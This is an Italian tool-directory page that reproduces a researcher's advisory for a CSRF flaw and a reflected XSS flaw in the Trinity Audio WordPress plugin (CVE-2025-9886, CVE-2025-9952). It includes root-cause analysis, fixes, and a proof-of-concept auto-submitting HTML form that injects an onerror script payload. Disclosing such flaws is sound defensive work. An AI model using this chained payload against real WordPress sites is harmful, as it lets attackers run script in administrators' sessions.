Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Trinity-Audio-CVE-Report2 — Divulgazione per CVE-2025-9886 e CVE-2025-9952 | Kitploit
Strumenti/GitHubGitHub/mooseloveti/trinity-audio-cve-report2
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e Formazione
GitHubmooseloveti/trinity-audio-cve-report2

Trinity-Audio-CVE-Report2

Divulgazione per CVE-2025-9886 e CVE-2025-9952

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
18 mesi faNon ancora revisionato

Trinity-Audio-CVE-Report 2

Divulgazione per CVE-2025-9886 e CVE-2025-9952.

CVE-2025-9886 e CVE-2025-9952 - Vulnerabilità in Trinity Audio

Questo repository divulga una vulnerabilità scoperta in Trinity Audio <= 5.20.1,plugin WordPress sviluppato da sergiotrinity.

🛠 Versione interessata

  • Prodotto: Trinity Audio
  • Versione: v5.20.1
  • URL: https://wordpress.org/plugins/trinity-audio/

🔒 CVE assegnate

CVE IDTipoComponenteImpatto
CVE-2025-9886Cross-Site Request Forgeryadmin/inc/post-management.phpAbilitazione/disabilitazione in blocco di Trinity Audio sui post nella sessione della vittima
CVE-2025-9952Reflected Cross-Site Scriptingadmin/inc/post-management.phpEsecuzione di script arbitrari

🧾 Descrizione dettagliata

CVE-2025-9886 — Cross-Site Request Forgery

  • Componente interessato: handler della pagina Post Management (admin/inc/post-management.php)

  • Vettore di attacco: POST cross-origin a wp-admin/admin.php?page=trinity_audio_post_management

  • Attivazione: un amministratore autenticato visita una pagina controllata dall'attaccante che invia automaticamente un modulo appositamente predisposto

  • Impatto: l'attaccante forza modifiche di stato in blocco (abilita/disabilita Trinity Audio su tutti i post o su un intervallo di date) con i privilegi dell'amministratore, compromettendo l'integrità e potenzialmente la disponibilità

CVE-2025-9952 — Cross-Site Scripting

  • Componente interessato: handler della pagina Post Management (admin/inc/post-management.php)

  • Vettore di attacco: POST cross-origin a wp-admin/admin.php?page=trinity_audio_post_management con post-management-action=activate-all-posts-range, range-before-after=after e una data valida seguita da HTML.

  • Attivazione: un amministratore autenticato visita una pagina controllata dall'attaccante che invia automaticamente il modulo appositamente predisposto. Deve esistere almeno un post pubblicato dopo la data fornita.

  • Impatto: JavaScript arbitrario viene eseguito nell'origine dell'amministratore, consentendo il furto di sessione, la manipolazione delle impostazioni o la concatenazione di attacchi CSRF.

PoC

 Combinando queste due vulnerabilità, un attaccante può eseguire script arbitrari indirizzando gli utenti verso un sito che contiene il seguente modulo.

  1. L'amministratore ha effettuato l'accesso al sito di destinazione.
  2. L'attaccante ospita il seguente HTML:
root@kitploit:~
<form method="POST" action="https://victim.example.com/wp-admin/admin.php?page=trinity_audio_post_management">
  <input type="hidden" name="action" value="1">
  <input type="hidden" name="post-management-action" value="activate-all-posts-range">
  <input type="hidden" name="range-before-after" value="after">
  <input type="hidden" name="range-date" value="2025-09-03&lt;img src=x onerror=alert(document.domain)&gt;">
</form>
<script>document.forms[0].submit();</script>

❓Causa della vulnerabilità

  • CSRF(CVE-2025-9886): L'endpoint che modifica lo stato accetta richieste cross-origin senza difese CSRF. Non c'è verifica del nonce (check_admin_referer/wp_verify_nonce) né validazione di Origin/Referer. Poiché i cookie vengono inviati automaticamente, un attaccante può far eseguire azioni nella sessione di un utente autenticato.

  • Reflected XSS(CVE-2025-9952): L'handler di Post Management (admin/inc/post-management.php) inserisce il valore POST di range-date nella notifica di successo senza codifica di output (nessun esc_html()/wp_kses()), consentendo l'iniezione di HTML/JS.

Correzione proposta:

  • Richiedere un token CSRF valido su tutte le richieste che modificano lo stato: aggiungere wp_nonce_field(...) ai moduli e verificare con check_admin_referer(...) o wp_verify_nonce(...).
  • Il parametro range-date deve essere sottoposto a escaping in modo appropriato prima di essere renderizzato.

Nota personale

A prima vista sembrano solo CSRF e Self-XSS, ma combinandoli, se il CSRF va a buon fine, è possibile eseguire JavaScript arbitrario. È stato divertente riuscire a creare un PoC così interessante.

🔍 Scopritore

Nome: MooseLove
Ruolo: ricercatore di sicurezza indipendente / bug hunter
Contatto: disponibile su richiesta


📚 Riferimenti

  • Prodotto: https://wordpress.org/plugins/trinity-audio/

⚠️ Licenza

Questo advisory è fornito per la sensibilizzazione pubblica sulla sicurezza. Libero da condividere citando la fonte.

Scarica lo strumento